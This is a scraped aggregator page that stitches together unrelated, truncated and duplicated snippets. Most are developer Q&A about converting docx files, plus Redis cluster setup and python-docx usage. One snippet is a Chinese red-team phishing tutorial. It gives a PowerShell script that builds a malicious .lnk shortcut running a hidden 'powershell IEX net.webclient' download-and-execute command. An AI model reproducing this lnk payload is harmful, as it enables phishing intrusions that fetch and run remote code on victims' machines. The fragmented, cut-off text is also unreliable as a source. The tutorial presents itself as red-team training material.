
Converting docx to PDF/A with libre office writer

与世无争的帅哥 提交于 2021-01-24 07:48:07
问题 I am happily converting docx files to PDF via the command line (controlled via C# process calls) out of my service. Unfortunately I could not find any internet search results on how to set the options for the output PDF that the GUI offers me. I am specifically looking for generating PDF/A and tagged PDF via the command line. Anyone ever done this and knows how to do that? EDIT: Obviously getting a PDF/A can be done by using unoconv instead. On windows one would use the following command line


时光怂恿深爱的人放手 提交于 2021-01-08 15:49:40
本文授权转载 来源: ChaBug 公众号 • 前言 在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。 钓鱼手段 Lnk(快捷方式) 可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD 当我点击谷歌浏览器时,弹出了CMD 可以进行更改图标 • 快速生成lnk样本 $WshShell = New-Object \-comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut( "test.lnk" ) $Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe" $Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,21" $Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('','.\\\


北城以北 提交于 2021-01-07 23:26:00
Spire.Doc for .NET 是一个专业的Word .NET库,设计用于帮助开发人员高效地开发创建、阅读、编写、转换和打印任何来自.NET( C#, VB.NET, ASP.NET)平台的Word文档文件的功能。( 点击下载 ) 从Spire.Doc V8.12.14开始,它支持在结构列表中获取两个Word文档之间的差异。本文将向您展示如何使用Spire.Doc通过比较两个Word文档来获得差异。 C# using Spire.Doc; using Spire.Doc.Documents; using Spire.Doc.Fields; using Spire.Doc.Formatting.Revisions; using System; namespace GetWordDifferences { class Program { static void Main(string[] args) { //Load the first Word document Document doc1 = new Document(); doc1.LoadFromFile("Sample1.docx"); //Load the second Word document Document doc2 = new Document(); doc2.LoadFromFile("Sample2

Error running with input a parameter in bat script

筅森魡賤 提交于 2021-01-07 01:00:08
问题 I am trying to convert a number of .doc files into .docx files and I found a solution: for %F in (*.doc) do "C:\Program Files\Microsoft Office\Office12\wordconv.exe" -oice -nme "%F" "%Fx" For the detailed info see: Automation: how to automate transforming .doc to .docx? Now I want to use the absolute path of wordconv.exe as an input parameter. Then my approach is like this: The contents of doc2docx.bat : for %F in (*.doc) do (%1 -oice -nme "%F" "%Fx") Run doc2docx.bat in console with:

Converting Docx Files To Text In Swift

陌路散爱 提交于 2021-01-01 08:57:35
问题 I have a .docx file in my temporary storage: let location: NSURL = NSURL.fileURLWithPath(NSTemporaryDirectory()) let file_Name = location.URLByAppendingPathComponent("5 November 2016.docx") What I now want to do is extract the text inside this document. But I cannot seem to find any converters or methods of doing this. I have tried this: let file_Content = try? NSString(contentsOfFile: String(file_Name), encoding: NSUTF8StringEncoding) print(file_Content) However it prints nil. So how do I

Converting Docx Files To Text In Swift

[亡魂溺海] 提交于 2021-01-01 08:57:01
问题 I have a .docx file in my temporary storage: let location: NSURL = NSURL.fileURLWithPath(NSTemporaryDirectory()) let file_Name = location.URLByAppendingPathComponent("5 November 2016.docx") What I now want to do is extract the text inside this document. But I cannot seem to find any converters or methods of doing this. I have tried this: let file_Content = try? NSString(contentsOfFile: String(file_Name), encoding: NSUTF8StringEncoding) print(file_Content) However it prints nil. So how do I


好久不见. 提交于 2020-12-24 09:44:25
1、第一步先安装Redis 参照<Windows下Redis安装及使用.docx> 在Redis目录E:/Redis下新建Logs文件夹,并且创建3个端口下的配置文件,记得修改里面的接口 (配置文件来启动3个不同的Redis实例,由于Redis默认端口为6379,所以这里使用了6380、6381、6382来运行3个Redis实例) X修改配置文件 port 6380 loglevel notice logfile "D:/Redis/Logs/redis6380_log.txt" appendonly yes appendfilename "appendonly.6380.aof" cluster-enabled yes cluster-config-file nodes.6380.conf cluster-node-timeout 15000 cluster-slave-validity-factor 10 cluster-migration-barrier 1 cluster-require-full-coverage yes 参数解释: port 6380 #端口号 loglevel notice #日志的记录级别,notice是适合生产环境的 logfile "Logs/redis6380_log.txt" #指定log的保持路径,默认是创建在Redis安装目录下


白昼怎懂夜的黑 提交于 2020-12-17 21:42:44
大家好!我叫蓝颜,我是一名大专生。这是我第一次接触博客园,以后也会一直在。 在学校期间,参加技能大赛(物联网),接触到的C#。之后学校教务处要一个调课软件, 于是我就小试牛刀试了试。当然了,这也是我第一次写,途中遇到很多问题。竟然是调课 系统肯定会用到word,因为老师的课表都是用word成列出来的,这时就遇到了如何用C# 调用已有word文件。我自己琢磨了好久,最后还是在老师的帮助下实现了次功能。我想 和 大家分享一下,下面是部分截图: 要引用office属性 然后再 using System.Data.OleDb; using MSWord = Microsoft.Office.Interop.Word; using System.IO; 之后可以百度,也可以借鉴我的代码: Microsoft.Office.Interop.Word.Application wapp = new Microsoft.Office.Interop.Word.Application(); MSWord.Document wordDoc; wapp.Visible = true ; object filename = Environment.CurrentDirectory + " \\ " + " 个人课表\\ " + cel + " .docx " ; // 课表路径 object isread

Docx to HTML: Headings' font style is not correct using DOCX4J

笑着哭i 提交于 2020-12-14 23:55:13
问题 I have a docx file with Heading1 style with Calibri Light (every other texts use Calibri Light too). After converting to html, Every texts are Calibri Light (correctly), but the text with Heading1 style is Times New Roman when I open the html file. (The reason: there is no font-family set for Heading1 style, inside of html file) When I open the docx file and check the Heading1 style's font, it says Calibri Light. Heading1 is based on "Normal" style in docx. This is the Normal style in docx:


好久不见. 提交于 2020-12-13 19:33:59
使用Python处理Word文档 1. 前言 2. 使用Document对象创建文档 3. 在word文档中使用标题 4. 在word文档中使用段落 5. 在word文档中使用列表 6. 在word文档中使用表格 7. 在word文档中使用章节 8. 在word文档中使用分页 9. 在word文档中使用图片 10. 读取word文档中的内容 本文将从下面两个方向来讲述如何使用Python操作Word文档: 使用Python读写Word文档 与Word文档中各个元素相关的类 1. 前言 这一节中主要是讲解 相 关的内容与做好准备工作,首先是安装需要用到的工具,也就是python-docx模块。使用pip安装如下: pip install python-docx 相信这一步大家都没问题,部分环境可能会有不能使用pip的情况,也可以使用easy_install或者源码来进行安装: 使用easy_install安装如下: easy_install python-docx 使用源码安装如下: tar xvzf python-docx-{version}.tar.gz cd python-docx-{version} python install 另外附上一个下载链接: https: / / /4a/ 8 e/ 5